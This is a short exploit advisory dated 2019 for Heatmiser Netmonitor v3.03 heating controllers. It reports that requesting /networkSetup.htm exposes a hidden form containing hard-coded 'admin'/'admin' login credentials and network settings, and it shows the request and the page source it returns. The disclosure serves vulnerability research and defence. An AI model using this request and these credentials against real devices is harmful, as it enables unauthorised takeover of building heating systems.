# Exploit Title: Heatmiser Netmonitor 3.03 - Hardcoded Credentials# Date: 2019-12-22 # Exploit Author: Ismail Tasdelen# Vendor Homepage: https://www.heatmiser.com/en/# Hardware Link: https://www.zoneregeling.nl/heatmiser/netmonitor-handleiding.pdf# Software: Netmonitor v3.03# Product Version: Netmonitor v3.03# CWE : CWE-798# Vulenrability: Use of Hard-coded Credentials# CVE: N/A# Decription :# Hard-coded Credentials security vulnerability of Netmonitor model v3.03# from Heatmiser manufacturer has been discovered. With this# vulnerability, the hidFrm form in the source code of the page# anonymously has access to hidden input codes. This information is# contained in the input field of the hidFrm form in the source code# lognm and logpd.
HTTP GET Request :/networkSetup.htm HTTP/1.1<form name="hidFrm" method="post"><inputtype="hidden" name="lognm" value="admin"><inputtype="hidden" name="logpd" value="admin"><inputtype="hidden" name="ip" value="XXX.XXX.XXX.XXX"><inputtype="hidden" name="mask" value="XXX.XXX.XXX.XXX"><inputtype="hidden" name="gate" value="XXX.XXX.XXX.XXX"><inputtype="hidden" name="dns" value="XXX.XXX.XXX.XXX"><inputtype="hidden" name="timestr" value="04:27"><inputtype="hidden" name="datestr" value="23/12/2019"><inputtype="hidden" name="timeflag",="" value="0"><inputtype="hidden" name="gmtflag",="" value="1"></form>